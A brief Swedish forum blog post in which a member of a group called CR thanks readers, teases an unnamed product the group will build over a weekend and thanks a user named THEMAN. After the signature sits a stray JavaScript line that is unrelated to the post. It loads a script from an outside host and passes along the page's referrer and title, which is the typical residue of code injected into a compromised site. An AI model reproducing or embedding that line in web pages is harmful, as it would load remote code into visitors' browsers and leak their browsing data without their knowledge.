Tja!

Jag ser ett mönster av att våra blogginlägg innehåller en inledning med ett stort tack i och detta är inget undantag. Vi på CR kom överens om att vi skulle göra allt för att fylla vårt (allas vårt) forum med så mycket värde som möjligt och att folk följer exemplet och öser på lika mycket gör mig oändligt glad.

Nu i helgen, om allt går väl, skall gänget bakom CR ännu en gång mötas upp och slå ihop våra huvuden och skapa något som vi hoppas, önskar och tror kommer skänka glädje, nytta och framgång till alla som tar del av det. Vad det är kan jag tyvärr inte än så länge uttrycka mig om men jag lovar att det kommer bli grymt!

Jag tror jag ska tacka THEMAN för initiativet och eftersom vi planerar att till viss del dela ut vår produkt gratis borde ni tacka honom med.

Vänta er en ljus framtid, cause I really do!

Love,

- Xtreeme

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;